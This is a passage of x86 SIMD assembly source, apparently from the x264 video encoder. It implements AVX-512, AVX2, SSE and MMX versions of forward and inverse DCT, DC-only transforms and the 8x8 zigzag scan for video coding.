psubw m0 {k2}, m3 ; 0'-1'-2'+3' 0'-1'<<1+2'<<1-3'
%endmacro
INIT_XMM avx512
cglobal sub4x4_dct
mov eax, 0xf0aa
kmovw k1, eax
PROLOGUE 3,3
movd m0, [r1+0*FENC_STRIDE]
movd m2, [r2+0*FDEC_STRIDE]
vpbroadcastd m0 {k1}, [r1+1*FENC_STRIDE]
vpbroadcastd m2 {k1}, [r2+1*FDEC_STRIDE]
movd m1, [r1+3*FENC_STRIDE]
movd m3, [r2+3*FDEC_STRIDE]
vpbroadcastd m1 {k1}, [r1+2*FENC_STRIDE]
vpbroadcastd m3 {k1}, [r2+2*FDEC_STRIDE]
kshiftrw k2, k1, 8
pxor m4, m4
punpcklbw m0, m4
punpcklbw m2, m4
punpcklbw m1, m4
punpcklbw m3, m4
DCT4x4_AVX512
mova [r0], m2
mova [r0+16], m0
RET
INIT_ZMM avx512
cglobal dct4x4x4_internal
punpcklbw m0, m1, m4
punpcklbw m2, m3, m4
punpckhbw m1, m4
punpckhbw m3, m4
DCT4x4_AVX512
mova m1, m2
vshufi32x4 m2 {k2}, m0, m0, q2200 ; m0
vshufi32x4 m0 {k3}, m1, m1, q3311 ; m1
ret
%macro DCT8x8_LOAD_FENC_AVX512 4 ; dst, perm, row1, row2
movu %1, [r1+%3*FENC_STRIDE]
vpermt2d %1, %2, [r1+%4*FENC_STRIDE]
%endmacro
%macro DCT8x8_LOAD_FDEC_AVX512 5 ; dst, perm, tmp, row1, row2
movu %1, [r2+(%4 )*FDEC_STRIDE]
vmovddup %1 {k1}, [r2+(%4+2)*FDEC_STRIDE]
movu %3, [r2+(%5 )*FDEC_STRIDE]
vmovddup %3 {k1}, [r2+(%5+2)*FDEC_STRIDE]
vpermt2d %1, %2, %3
%endmacro
cglobal sub8x8_dct, 3,3
mova m0, [dct_avx512]
DCT8x8_LOAD_FENC_AVX512 m1, m0, 0, 4 ; 0 2 1 3
mov r1d, 0xaaaaaaaa
kmovd k1, r1d
psrld m0, 5
DCT8x8_LOAD_FDEC_AVX512 m3, m0, m2, 0, 4
mov r1d, 0xf0f0f0f0
kmovd k2, r1d
pxor xm4, xm4
knotw k3, k2
call dct4x4x4_internal_avx512
mova [r0], m0
mova [r0+64], m1
RET
%macro SUB4x16_DCT_AVX512 2 ; dst, src
vpermd m1, m5, [r1+1*%2*64]
mova m3, [r2+2*%2*64]
vpermt2d m3, m6, [r2+2*%2*64+64]
call dct4x4x4_internal_avx512
mova [r0+%1*64 ], m0
mova [r0+%1*64+128], m1
%endmacro
cglobal sub16x16_dct
psrld m5, [dct_avx512], 10
mov eax, 0xaaaaaaaa
kmovd k1, eax
mov eax, 0xf0f0f0f0
kmovd k2, eax
PROLOGUE 3,3
pxor xm4, xm4
knotw k3, k2
psrld m6, m5, 4
SUB4x16_DCT_AVX512 0, 0
SUB4x16_DCT_AVX512 1, 1
SUB4x16_DCT_AVX512 4, 2
SUB4x16_DCT_AVX512 5, 3
RET
cglobal sub8x8_dct_dc, 3,3
mova m3, [dct_avx512]
DCT8x8_LOAD_FENC_AVX512 m0, m3, 0, 4 ; 0 2 1 3
mov r1d, 0xaa
kmovb k1, r1d
psrld m3, 5
DCT8x8_LOAD_FDEC_AVX512 m1, m3, m2, 0, 4
pxor xm3, xm3
psadbw m0, m3
psadbw m1, m3
psubw m0, m1
vpmovqw xmm0, m0
vprold xmm1, xmm0, 16
paddw xmm0, xmm1 ; 0 0 2 2 1 1 3 3
punpckhqdq xmm2, xmm0, xmm0
psubw xmm1, xmm0, xmm2 ; 0-1 0-1 2-3 2-3
paddw xmm0, xmm2 ; 0+1 0+1 2+3 2+3
punpckldq xmm0, xmm1 ; 0+1 0+1 0-1 0-1 2+3 2+3 2-3 2-3
punpcklqdq xmm1, xmm0, xmm0
psubw xmm0 {k1}, xm3, xmm0
paddw xmm0, xmm1 ; 0+1+2+3 0+1-2-3 0-1+2-3 0-1-2+3
movhps [r0], xmm0
RET
cglobal sub8x16_dct_dc, 3,3
mova m5, [dct_avx512]
DCT8x8_LOAD_FENC_AVX512 m0, m5, 0, 8 ; 0 4 1 5
DCT8x8_LOAD_FENC_AVX512 m1, m5, 4, 12 ; 2 6 3 7
mov r1d, 0xaa
kmovb k1, r1d
psrld m5, 5
DCT8x8_LOAD_FDEC_AVX512 m2, m5, m4, 0, 8
DCT8x8_LOAD_FDEC_AVX512 m3, m5, m4, 4, 12
pxor xm4, xm4
psadbw m0, m4
psadbw m1, m4
psadbw m2, m4
psadbw m3, m4
psubw m0, m2
psubw m1, m3
SBUTTERFLY qdq, 0, 1, 2
paddw m0, m1
vpmovqw xmm0, m0 ; 0 2 4 6 1 3 5 7
psrlq xmm2, xmm0, 32
psubw xmm1, xmm0, xmm2 ; 0-4 2-6 1-5 3-7
paddw xmm0, xmm2 ; 0+4 2+6 1+5 3+7
punpckhdq xmm2, xmm0, xmm1
punpckldq xmm0, xmm1
psubw xmm1, xmm0, xmm2 ; 0-1+4-5 2-3+6-7 0-1-4+5 2-3-6+7
paddw xmm0, xmm2 ; 0+1+4+5 2+3+6+7 0+1-4-5 2+3-6-7
punpcklwd xmm0, xmm1
psrlq xmm2, xmm0, 32
psubw xmm1, xmm0, xmm2 ; 0+1-2-3+4+5-6-7 0-1-2+3+4-5-6+7 0+1-2-3-4-5+6+7 0-1-2+3-4+5+6-7
paddw xmm0, xmm2 ; 0+1+2+3+4+5+6+7 0-1+2-3+4-5+6-7 0+1+2+3-4-5-6-7 0-1+2-3-4+5-6+7
shufps xmm0, xmm1, q0220
mova [r0], xmm0
RET
%macro SARSUMSUB 3 ; a, b, tmp
mova m%3, m%1
vpsraw m%1 {k1}, 1
psubw m%1, m%2 ; 0-2 1>>1-3
vpsraw m%2 {k1}, 1
paddw m%2, m%3 ; 0+2 1+3>>1
%endmacro
cglobal add8x8_idct, 2,2
mova m1, [r1]
mova m2, [r1+64]
mova m3, [dct_avx512]
vbroadcasti32x4 m4, [pw_32]
mov r1d, 0xf0f0f0f0
kxnorb k2, k2, k2
kmovd k1, r1d
kmovb k3, k2
vshufi32x4 m0, m1, m2, q2020 ; 0 1 4 5 8 9 c d
vshufi32x4 m1, m2, q3131 ; 2 3 6 7 a b e f
psrlq m5, m3, 56 ; {0, 3, 1, 2, 4, 7, 5, 6} * FDEC_STRIDE
vpgatherqq m6 {k2}, [r0+m5]
SARSUMSUB 0, 1, 2
SBUTTERFLY wd, 1, 0, 2
psrlq m7, m3, 28
SUMSUB_BA w, 0, 1, 2 ; 0+1+2+3>>1 0+1>>1-2-3
vprold m1, 16 ; 0-1>>1-2+3 0-1+2-3>>1
SBUTTERFLY dq, 0, 1, 2
psrlq m3, 24
SARSUMSUB 0, 1, 2
vpermi2q m3, m1, m0
vpermt2q m1, m7, m0
paddw m3, m4 ; += 32
SUMSUB_BA w, 1, 3, 0
psraw m1, 6 ; 0'+1'+2'+3'>>1 0'+1'>>1-2'-3'
psraw m3, 6 ; 0'-1'+2'-3'>>1 0'-1'>>1-2'+3'
pxor xm0, xm0
SBUTTERFLY bw, 6, 0, 2
paddsw m1, m6
paddsw m3, m0
packuswb m1, m3
vpscatterqq [r0+m5] {k3}, m1
RET
%endif ; HIGH_BIT_DEPTH
INIT_MMX
;-----------------------------------------------------------------------------
; void sub8x8_dct( int16_t dct[4][4][4], uint8_t *pix1, uint8_t *pix2 )
;-----------------------------------------------------------------------------
%macro SUB_NxN_DCT 7
cglobal %1, 3,3,%7
%if HIGH_BIT_DEPTH == 0
%if mmsize == 8
pxor m7, m7
%else
add r2, 4*FDEC_STRIDE
mova m7, [hsub_mul]
%endif
%endif ; !HIGH_BIT_DEPTH
.skip_prologue:
call %2.skip_prologue
add r0, %3
add r1, %4-%5-%6*FENC_STRIDE
add r2, %4-%5-%6*FDEC_STRIDE
call %2.skip_prologue
add r0, %3
add r1, (%4-%6)*FENC_STRIDE-%5-%4
add r2, (%4-%6)*FDEC_STRIDE-%5-%4
call %2.skip_prologue
add r0, %3
add r1, %4-%5-%6*FENC_STRIDE
add r2, %4-%5-%6*FDEC_STRIDE
TAIL_CALL %2.skip_prologue, 1
%endmacro
;-----------------------------------------------------------------------------
; void add8x8_idct( uint8_t *pix, int16_t dct[4][4][4] )
;-----------------------------------------------------------------------------
%macro ADD_NxN_IDCT 6-7
%if HIGH_BIT_DEPTH
cglobal %1, 2,2,%7
%if %3==256
add r1, 128
%endif
%else
cglobal %1, 2,2,11
pxor m7, m7
%endif
%if mmsize>=16 && %3!=256
add r0, 4*FDEC_STRIDE
%endif
.skip_prologue:
call %2.skip_prologue
add r0, %4-%5-%6*FDEC_STRIDE
add r1, %3
call %2.skip_prologue
add r0, (%4-%6)*FDEC_STRIDE-%5-%4
add r1, %3
call %2.skip_prologue
add r0, %4-%5-%6*FDEC_STRIDE
add r1, %3
TAIL_CALL %2.skip_prologue, 1
%endmacro
%if HIGH_BIT_DEPTH
INIT_MMX
SUB_NxN_DCT sub8x8_dct_mmx, sub4x4_dct_mmx, 64, 8, 0, 0, 0
SUB_NxN_DCT sub16x16_dct_mmx, sub8x8_dct_mmx, 64, 16, 8, 8, 0
INIT_XMM
ADD_NxN_IDCT add8x8_idct_sse2, add4x4_idct_sse2, 64, 8, 0, 0, 6
ADD_NxN_IDCT add16x16_idct_sse2, add8x8_idct_sse2, 64, 16, 8, 8, 6
ADD_NxN_IDCT add8x8_idct_avx, add4x4_idct_avx, 64, 8, 0, 0, 6
ADD_NxN_IDCT add16x16_idct_avx, add8x8_idct_avx, 64, 16, 8, 8, 6
cextern add8x8_idct8_sse2.skip_prologue
cextern add8x8_idct8_avx.skip_prologue
ADD_NxN_IDCT add16x16_idct8_sse2, add8x8_idct8_sse2, 256, 16, 0, 0, 16
ADD_NxN_IDCT add16x16_idct8_avx, add8x8_idct8_avx, 256, 16, 0, 0, 16
cextern sub8x8_dct8_sse2.skip_prologue
cextern sub8x8_dct8_sse4.skip_prologue
cextern sub8x8_dct8_avx.skip_prologue
SUB_NxN_DCT sub16x16_dct8_sse2, sub8x8_dct8_sse2, 256, 16, 0, 0, 14
SUB_NxN_DCT sub16x16_dct8_sse4, sub8x8_dct8_sse4, 256, 16, 0, 0, 14
SUB_NxN_DCT sub16x16_dct8_avx, sub8x8_dct8_avx, 256, 16, 0, 0, 14
%else ; !HIGH_BIT_DEPTH
%if ARCH_X86_64 == 0
INIT_MMX
SUB_NxN_DCT sub8x8_dct_mmx, sub4x4_dct_mmx, 32, 4, 0, 0, 0
ADD_NxN_IDCT add8x8_idct_mmx, add4x4_idct_mmx, 32, 4, 0, 0
SUB_NxN_DCT sub16x16_dct_mmx, sub8x8_dct_mmx, 32, 8, 4, 4, 0
ADD_NxN_IDCT add16x16_idct_mmx, add8x8_idct_mmx, 32, 8, 4, 4
cextern sub8x8_dct8_mmx.skip_prologue
cextern add8x8_idct8_mmx.skip_prologue
SUB_NxN_DCT sub16x16_dct8_mmx, sub8x8_dct8_mmx, 128, 8, 0, 0, 0
ADD_NxN_IDCT add16x16_idct8_mmx, add8x8_idct8_mmx, 128, 8, 0, 0
%endif
INIT_XMM
cextern sub8x8_dct_sse2.skip_prologue
cextern sub8x8_dct_ssse3.skip_prologue
cextern sub8x8_dct_avx.skip_prologue
cextern sub8x8_dct_xop.skip_prologue
SUB_NxN_DCT sub16x16_dct_sse2, sub8x8_dct_sse2, 128, 8, 0, 0, 10
SUB_NxN_DCT sub16x16_dct_ssse3, sub8x8_dct_ssse3, 128, 8, 0, 0, 10
SUB_NxN_DCT sub16x16_dct_avx, sub8x8_dct_avx, 128, 8, 0, 0, 10
SUB_NxN_DCT sub16x16_dct_xop, sub8x8_dct_xop, 128, 8, 0, 0, 10
cextern add8x8_idct_sse2.skip_prologue
cextern add8x8_idct_avx.skip_prologue
ADD_NxN_IDCT add16x16_idct_sse2, add8x8_idct_sse2, 128, 8, 0, 0
ADD_NxN_IDCT add16x16_idct_avx, add8x8_idct_avx, 128, 8, 0, 0
cextern add8x8_idct8_sse2.skip_prologue
cextern add8x8_idct8_avx.skip_prologue
ADD_NxN_IDCT add16x16_idct8_sse2, add8x8_idct8_sse2, 128, 8, 0, 0
ADD_NxN_IDCT add16x16_idct8_avx, add8x8_idct8_avx, 128, 8, 0, 0
cextern sub8x8_dct8_sse2.skip_prologue
cextern sub8x8_dct8_ssse3.skip_prologue
cextern sub8x8_dct8_avx.skip_prologue
SUB_NxN_DCT sub16x16_dct8_sse2, sub8x8_dct8_sse2, 128, 8, 0, 0, 11
SUB_NxN_DCT sub16x16_dct8_ssse3, sub8x8_dct8_ssse3, 128, 8, 0, 0, 11
SUB_NxN_DCT sub16x16_dct8_avx, sub8x8_dct8_avx, 128, 8, 0, 0, 11
INIT_YMM
ADD_NxN_IDCT add16x16_idct_avx2, add8x8_idct_avx2, 128, 8, 0, 0
%endif ; HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void add8x8_idct_dc( pixel *p_dst, dctcoef *dct2x2 )
;-----------------------------------------------------------------------------
%macro ADD_DC 2
mova m0, [%1+FDEC_STRIDEB*0] ; 8pixels
mova m1, [%1+FDEC_STRIDEB*1]
mova m2, [%1+FDEC_STRIDEB*2]
paddsw m0, %2
paddsw m1, %2
paddsw m2, %2
paddsw %2, [%1+FDEC_STRIDEB*3]
CLIPW m0, m5, m6
CLIPW m1, m5, m6
CLIPW m2, m5, m6
CLIPW %2, m5, m6
mova [%1+FDEC_STRIDEB*0], m0
mova [%1+FDEC_STRIDEB*1], m1
mova [%1+FDEC_STRIDEB*2], m2
mova [%1+FDEC_STRIDEB*3], %2
%endmacro
%macro ADD_IDCT_DC 0
cglobal add8x8_idct_dc, 2,2,7
mova m6, [pw_pixel_max]
pxor m5, m5
mova m3, [r1]
paddd m3, [pd_32]
psrad m3, 6 ; dc0 0 dc1 0 dc2 0 dc3 0
pshuflw m4, m3, q2200 ; dc0 dc0 dc1 dc1 _ _ _ _
pshufhw m3, m3, q2200 ; _ _ _ _ dc2 dc2 dc3 dc3
pshufd m4, m4, q1100 ; dc0 dc0 dc0 dc0 dc1 dc1 dc1 dc1
pshufd m3, m3, q3322 ; dc2 dc2 dc2 dc2 dc3 dc3 dc3 dc3
ADD_DC r0+FDEC_STRIDEB*0, m4
ADD_DC r0+FDEC_STRIDEB*4, m3
RET
cglobal add16x16_idct_dc, 2,3,8
mov r2, 4
mova m6, [pw_pixel_max]
mova m7, [pd_32]
pxor m5, m5
.loop:
mova m3, [r1]
paddd m3, m7
psrad m3, 6 ; dc0 0 dc1 0 dc2 0 dc3 0
pshuflw m4, m3, q2200 ; dc0 dc0 dc1 dc1 _ _ _ _
pshufhw m3, m3, q2200 ; _ _ _ _ dc2 dc2 dc3 dc3
pshufd m4, m4, q1100 ; dc0 dc0 dc0 dc0 dc1 dc1 dc1 dc1
pshufd m3, m3, q3322 ; dc2 dc2 dc2 dc2 dc3 dc3 dc3 dc3
ADD_DC r0+FDEC_STRIDEB*0, m4
ADD_DC r0+SIZEOF_PIXEL*8, m3
add r1, 16
add r0, 4*FDEC_STRIDEB
dec r2
jg .loop
RET
%endmacro ; ADD_IDCT_DC
INIT_XMM sse2
ADD_IDCT_DC
INIT_XMM avx
ADD_IDCT_DC
%else ;!HIGH_BIT_DEPTH
%macro ADD_DC 3
mova m4, [%3+FDEC_STRIDE*0]
mova m5, [%3+FDEC_STRIDE*1]
mova m6, [%3+FDEC_STRIDE*2]
paddusb m4, %1
paddusb m5, %1
paddusb m6, %1
paddusb %1, [%3+FDEC_STRIDE*3]
psubusb m4, %2
psubusb m5, %2
psubusb m6, %2
psubusb %1, %2
mova [%3+FDEC_STRIDE*0], m4
mova [%3+FDEC_STRIDE*1], m5
mova [%3+FDEC_STRIDE*2], m6
mova [%3+FDEC_STRIDE*3], %1
%endmacro
INIT_MMX mmx2
cglobal add8x8_idct_dc, 2,2
mova m0, [r1]
pxor m1, m1
add r0, FDEC_STRIDE*4
paddw m0, [pw_32]
psraw m0, 6
psubw m1, m0
packuswb m0, m0
packuswb m1, m1
punpcklbw m0, m0
punpcklbw m1, m1
pshufw m2, m0, q3322
pshufw m3, m1, q3322
punpcklbw m0, m0
punpcklbw m1, m1
ADD_DC m0, m1, r0-FDEC_STRIDE*4
ADD_DC m2, m3, r0
RET
INIT_XMM ssse3
cglobal add8x8_idct_dc, 2,2
movh m0, [r1]
pxor m1, m1
add r0, FDEC_STRIDE*4
pmulhrsw m0, [pw_512]
psubw m1, m0
mova m5, [pb_unpackbd1]
packuswb m0, m0
packuswb m1, m1
pshufb m0, m5
pshufb m1, m5
movh m2, [r0+FDEC_STRIDE*-4]
movh m3, [r0+FDEC_STRIDE*-3]
movh m4, [r0+FDEC_STRIDE*-2]
movh m5, [r0+FDEC_STRIDE*-1]
movhps m2, [r0+FDEC_STRIDE* 0]
movhps m3, [r0+FDEC_STRIDE* 1]
movhps m4, [r0+FDEC_STRIDE* 2]
movhps m5, [r0+FDEC_STRIDE* 3]
paddusb m2, m0
paddusb m3, m0
paddusb m4, m0
paddusb m5, m0
psubusb m2, m1
psubusb m3, m1
psubusb m4, m1
psubusb m5, m1
movh [r0+FDEC_STRIDE*-4], m2
movh [r0+FDEC_STRIDE*-3], m3
movh [r0+FDEC_STRIDE*-2], m4
movh [r0+FDEC_STRIDE*-1], m5
movhps [r0+FDEC_STRIDE* 0], m2
movhps [r0+FDEC_STRIDE* 1], m3
movhps [r0+FDEC_STRIDE* 2], m4
movhps [r0+FDEC_STRIDE* 3], m5
RET
INIT_MMX mmx2
cglobal add16x16_idct_dc, 2,3
mov r2, 4
.loop:
mova m0, [r1]
pxor m1, m1
paddw m0, [pw_32]
psraw m0, 6
psubw m1, m0
packuswb m0, m0
packuswb m1, m1
punpcklbw m0, m0
punpcklbw m1, m1
pshufw m2, m0, q3322
pshufw m3, m1, q3322
punpcklbw m0, m0
punpcklbw m1, m1
ADD_DC m0, m1, r0
ADD_DC m2, m3, r0+8
add r1, 8
add r0, FDEC_STRIDE*4
dec r2
jg .loop
RET
INIT_XMM sse2
cglobal add16x16_idct_dc, 2,2,8
call .loop
add r0, FDEC_STRIDE*4
TAIL_CALL .loop, 0
.loop:
add r0, FDEC_STRIDE*4
movq m0, [r1+0]
movq m2, [r1+8]
add r1, 16
punpcklwd m0, m0
punpcklwd m2, m2
pxor m3, m3
paddw m0, [pw_32]
paddw m2, [pw_32]
psraw m0, 6
psraw m2, 6
psubw m1, m3, m0
packuswb m0, m1
psubw m3, m2
punpckhbw m1, m0, m0
packuswb m2, m3
punpckhbw m3, m2, m2
punpcklbw m0, m0
punpcklbw m2, m2
ADD_DC m0, m1, r0+FDEC_STRIDE*-4
ADD_DC m2, m3, r0
ret
%macro ADD16x16 0
cglobal add16x16_idct_dc, 2,2,8
call .loop
add r0, FDEC_STRIDE*4
TAIL_CALL .loop, 0
.loop:
add r0, FDEC_STRIDE*4
mova m0, [r1]
add r1, 16
pxor m1, m1
pmulhrsw m0, [pw_512]
psubw m1, m0
mova m5, [pb_unpackbd1]
mova m6, [pb_unpackbd2]
packuswb m0, m0
packuswb m1, m1
pshufb m2, m0, m6
pshufb m0, m5
pshufb m3, m1, m6
pshufb m1, m5
ADD_DC m0, m1, r0+FDEC_STRIDE*-4
ADD_DC m2, m3, r0
ret
%endmacro ; ADD16x16
INIT_XMM ssse3
ADD16x16
INIT_XMM avx
ADD16x16
%macro ADD_DC_AVX2 3
mova xm4, [r0+FDEC_STRIDE*0+%3]
mova xm5, [r0+FDEC_STRIDE*1+%3]
vinserti128 m4, m4, [r2+FDEC_STRIDE*0+%3], 1
vinserti128 m5, m5, [r2+FDEC_STRIDE*1+%3], 1
paddusb m4, %1
paddusb m5, %1
psubusb m4, %2
psubusb m5, %2
mova [r0+FDEC_STRIDE*0+%3], xm4
mova [r0+FDEC_STRIDE*1+%3], xm5
vextracti128 [r2+FDEC_STRIDE*0+%3], m4, 1
vextracti128 [r2+FDEC_STRIDE*1+%3], m5, 1
%endmacro
INIT_YMM avx2
cglobal add16x16_idct_dc, 2,3,6
add r0, FDEC_STRIDE*4
mova m0, [r1]
pxor m1, m1
pmulhrsw m0, [pw_512]
psubw m1, m0
mova m4, [pb_unpackbd1]
mova m5, [pb_unpackbd2]
packuswb m0, m0
packuswb m1, m1
pshufb m2, m0, m4 ; row0, row2
pshufb m3, m1, m4 ; row0, row2
pshufb m0, m5 ; row1, row3
pshufb m1, m5 ; row1, row3
lea r2, [r0+FDEC_STRIDE*8]
ADD_DC_AVX2 m2, m3, FDEC_STRIDE*-4
ADD_DC_AVX2 m2, m3, FDEC_STRIDE*-2
ADD_DC_AVX2 m0, m1, FDEC_STRIDE* 0
ADD_DC_AVX2 m0, m1, FDEC_STRIDE* 2
RET
%endif ; HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void sub8x8_dct_dc( int16_t dct[2][2], uint8_t *pix1, uint8_t *pix2 )
;-----------------------------------------------------------------------------
%macro DCTDC_2ROW_MMX 4
mova %1, [r1+FENC_STRIDE*(0+%3)]
mova m1, [r1+FENC_STRIDE*(1+%3)]
mova m2, [r2+FDEC_STRIDE*(0+%4)]
mova m3, [r2+FDEC_STRIDE*(1+%4)]
mova %2, %1
punpckldq %1, m1
punpckhdq %2, m1
mova m1, m2
punpckldq m2, m3
punpckhdq m1, m3
pxor m3, m3
psadbw %1, m3
psadbw %2, m3
psadbw m2, m3
psadbw m1, m3
psubw %1, m2
psubw %2, m1
%endmacro
%macro DCT2x2 2 ; reg s1/s0, reg s3/s2 (!=m0/m1)
PSHUFLW m1, %1, q2200 ; s1 s1 s0 s0
PSHUFLW m0, %2, q2301 ; s3 __ s2 __
paddw m1, %2 ; s1 s13 s0 s02
psubw m1, m0 ; d13 s13 d02 s02
PSHUFLW m0, m1, q1010 ; d02 s02 d02 s02
psrlq m1, 32 ; __ __ d13 s13
paddw m0, m1 ; d02 s02 d02+d13 s02+s13
psllq m1, 32 ; d13 s13
psubw m0, m1 ; d02-d13 s02-s13 d02+d13 s02+s13
%endmacro
%if HIGH_BIT_DEPTH == 0
INIT_MMX mmx2
cglobal sub8x8_dct_dc, 3,3
DCTDC_2ROW_MMX m0, m4, 0, 0
DCTDC_2ROW_MMX m5, m6, 2, 2
paddw m0, m5
paddw m4, m6
punpckldq m0, m4
add r2, FDEC_STRIDE*4
DCTDC_2ROW_MMX m7, m4, 4, 0
DCTDC_2ROW_MMX m5, m6, 6, 2
paddw m7, m5
paddw m4, m6
punpckldq m7, m4
DCT2x2 m0, m7
mova [r0], m0
ret
%macro DCTDC_2ROW_SSE2 4
movh m1, [r1+FENC_STRIDE*(0+%1)]
movh m2, [r1+FENC_STRIDE*(1+%1)]
punpckldq m1, m2
movh m2, [r2+FDEC_STRIDE*(0+%2)]
punpckldq m2, [r2+FDEC_STRIDE*(1+%2)]
psadbw m1, m0
psadbw m2, m0
ACCUM paddd, %4, 1, %3
psubd m%4, m2
%endmacro
INIT_XMM sse2
cglobal sub8x8_dct_dc, 3,3
pxor m0, m0
DCTDC_2ROW_SSE2 0, 0, 0, 3
DCTDC_2ROW_SSE2 2, 2, 1, 3
add r2, FDEC_STRIDE*4
DCTDC_2ROW_SSE2 4, 0, 0, 4
DCTDC_2ROW_SSE2 6, 2, 1, 4
packssdw m3, m3
packssdw m4, m4
DCT2x2 m3, m4
movq [r0], m0
RET
%macro SUB8x16_DCT_DC 0
cglobal sub8x16_dct_dc, 3,3
pxor m0, m0
DCTDC_2ROW_SSE2 0, 0, 0, 3
DCTDC_2ROW_SSE2 2, 2, 1, 3
add r1, FENC_STRIDE*8
add r2, FDEC_STRIDE*8
DCTDC_2ROW_SSE2 -4, -4, 0, 4
DCTDC_2ROW_SSE2 -2, -2, 1, 4
shufps m3, m4, q2020
DCTDC_2ROW_SSE2 0, 0, 0, 5
DCTDC_2ROW_SSE2 2, 2, 1, 5
add r2, FDEC_STRIDE*4
DCTDC_2ROW_SSE2 4, 0, 0, 4
DCTDC_2ROW_SSE2 6, 2, 1, 4
shufps m5, m4, q2020
%if cpuflag(ssse3)
%define %%sign psignw
%else
%define %%sign pmullw
%endif
SUMSUB_BA d, 5, 3, 0
packssdw m5, m3
pshuflw m0, m5, q2301
pshufhw m0, m0, q2301
%%sign m5, [pw_pmpmpmpm]
paddw m0, m5
pshufd m1, m0, q1320
pshufd m0, m0, q0231
%%sign m1, [pw_ppppmmmm]
paddw m0, m1
mova [r0], m0
RET
%endmacro ; SUB8x16_DCT_DC
INIT_XMM sse2
SUB8x16_DCT_DC
INIT_XMM ssse3
SUB8x16_DCT_DC
%endif ; !HIGH_BIT_DEPTH
%macro DCTDC_4ROW_SSE2 2
mova %1, [r1+FENC_STRIDEB*%2]
mova m0, [r2+FDEC_STRIDEB*%2]
%assign Y (%2+1)
%rep 3
paddw %1, [r1+FENC_STRIDEB*Y]
paddw m0, [r2+FDEC_STRIDEB*Y]
%assign Y (Y+1)
%endrep
psubw %1, m0
pshufd m0, %1, q2301
paddw %1, m0
%endmacro
%if HIGH_BIT_DEPTH
%macro SUB8x8_DCT_DC_10 0
cglobal sub8x8_dct_dc, 3,3,3
DCTDC_4ROW_SSE2 m1, 0
DCTDC_4ROW_SSE2 m2, 4
mova m0, [pw_ppmmmmpp]
pmaddwd m1, m0
pmaddwd m2, m0
pshufd m0, m1, q2200 ; -1 -1 +0 +0
pshufd m1, m1, q0033 ; +0 +0 +1 +1
paddd m1, m0
pshufd m0, m2, q1023 ; -2 +2 -3 +3
paddd m1, m2
paddd m1, m0
mova [r0], m1
RET
%endmacro
INIT_XMM sse2
SUB8x8_DCT_DC_10
%macro SUB8x16_DCT_DC_10 0
cglobal sub8x16_dct_dc, 3,3,6
DCTDC_4ROW_SSE2 m1, 0
DCTDC_4ROW_SSE2 m2, 4
DCTDC_4ROW_SSE2 m3, 8
DCTDC_4ROW_SSE2 m4, 12
mova m0, [pw_ppmmmmpp]
pmaddwd m1, m0
pmaddwd m2, m0
pshufd m5, m1, q2200 ; -1 -1 +0 +0
pshufd m1, m1, q0033 ; +0 +0 +1 +1
paddd m1, m5
pshufd m5, m2, q1023 ; -2 +2 -3 +3
paddd m1, m2
paddd m1, m5 ; a6 a2 a4 a0
pmaddwd m3, m0
pmaddwd m4, m0
pshufd m5, m3, q2200
pshufd m3, m3, q0033
paddd m3, m5
pshufd m5, m4, q1023
paddd m3, m4
paddd m3, m5 ; a7 a3 a5 a1
paddd m0, m1, m3
psubd m1, m3
pshufd m0, m0, q3120
pshufd m1, m1, q3120
punpcklqdq m2, m0, m1
punpckhqdq m1, m0
mova [r0+ 0], m2
mova [r0+16], m1
RET
%endmacro
INIT_XMM sse2
SUB8x16_DCT_DC_10
INIT_XMM avx
SUB8x16_DCT_DC_10
%endif
;-----------------------------------------------------------------------------
; void zigzag_scan_8x8_frame( int16_t level[64], int16_t dct[8][8] )
;-----------------------------------------------------------------------------
%macro SCAN_8x8 0
cglobal zigzag_scan_8x8_frame, 2,2,8
movdqa xmm0, [r1]
movdqa xmm1, [r1+16]
movdq2q mm0, xmm0
PALIGNR xmm1, xmm1, 14, xmm2
movdq2q mm1, xmm1
movdqa xmm2, [r1+32]
movdqa xmm3, [r1+48]
PALIGNR xmm2, xmm2, 12, xmm4
movdq2q mm2, xmm2
PALIGNR xmm3, xmm3, 10, xmm4
movdq2q mm3, xmm3
punpckhwd xmm0, xmm1
punpckhwd xmm2, xmm3
movq mm4, mm1
movq mm5, mm1
movq mm6, mm2
movq mm7, mm3
punpckhwd mm1, mm0
psllq mm0, 16
psrlq mm3, 16
punpckhdq mm1, mm1
punpckhdq mm2, mm0
punpcklwd mm0, mm4
punpckhwd mm4, mm3
punpcklwd mm4, mm2
punpckhdq mm0, mm2
punpcklwd mm6, mm3
punpcklwd mm5, mm7
punpcklwd mm5, mm6
movdqa xmm4, [r1+64]
movdqa xmm5, [r1+80]
movdqa xmm6, [r1+96]
movdqa xmm7, [r1+112]
movq [r0+2*00], mm0
movq [r0+2*04], mm4
movd [r0+2*08], mm1
movq [r0+2*36], mm5
movq [r0+2*46], mm6
PALIGNR xmm4, xmm4, 14, xmm3
movdq2q mm4, xmm4
PALIGNR xmm5, xmm5, 12, xmm3
movdq2q mm5, xmm5
PALIGNR xmm6, xmm6, 10, xmm3
movdq2q mm6, xmm6
%if cpuflag(ssse3)
PALIGNR xmm7, xmm7, 8, xmm3
movdq2q mm7, xmm7
%else
movhlps xmm3, xmm7
punpcklqdq xmm7, xmm7
movdq2q mm7, xmm3
%endif
punpckhwd xmm4, xmm5
punpckhwd xmm6, xmm7
movq mm0, mm4
movq mm1, mm5
movq mm3, mm7
punpcklwd mm7, mm6
psrlq mm6, 16
punpcklwd mm4, mm6
punpcklwd mm5, mm4
punpckhdq mm4, mm3
punpcklwd mm3, mm6
punpckhwd mm3, mm4
punpckhwd mm0, mm1
punpckldq mm4, mm0
punpckhdq mm0, mm6
pshufw mm4, mm4, q1230
movq [r0+2*14], mm4
movq [r0+2*25], mm0
movd [r0+2*54], mm7
movq [r0+2*56], mm5
movq [r0+2*60], mm3
punpckhdq xmm3, xmm0, xmm2
punpckldq xmm0, xmm2
punpckhdq xmm7, xmm4, xmm6
punpckldq xmm4, xmm6
pshufhw xmm0, xmm0, q0123
pshuflw xmm4, xmm4, q0123
pshufhw xmm3, xmm3, q0123
pshuflw xmm7, xmm7, q0123
movlps [r0+2*10], xmm0
movhps [r0+2*17], xmm0
movlps [r0+2*21], xmm3
movlps [r0+2*28], xmm4
movhps [r0+2*32], xmm3
movhps [r0+2*39], xmm4
movlps [r0+2*43], xmm7
movhps [r0+2*50], xmm7
RET
%endmacro
%if HIGH_BIT_DEPTH == 0
INIT_XMM sse2
SCAN_8x8
INIT_XMM ssse3
